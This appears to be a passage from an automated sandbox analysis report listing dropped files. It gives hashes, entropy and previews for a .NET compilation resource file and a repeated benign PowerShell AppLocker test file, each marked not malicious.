                                              SHA1:80EA986C44A962CA7CBDA120B32190D6D43CB545
                                              SHA-256:E3BB0052A4E46C601C84D5895A84E34B3DA0286F0EF673D18E9409299EA23C46
                                              SHA-512:C881D14C61DD99631FB8C397C50ACFDB6109700202E708CEA1AFF93DBE2AE7D6325AE87AA580277BC7AF52B5D8F0951BE415215D5D0C868BE615414E4878C2D7
                                              Malicious:false
                                              Preview:L.../C.f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP..................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
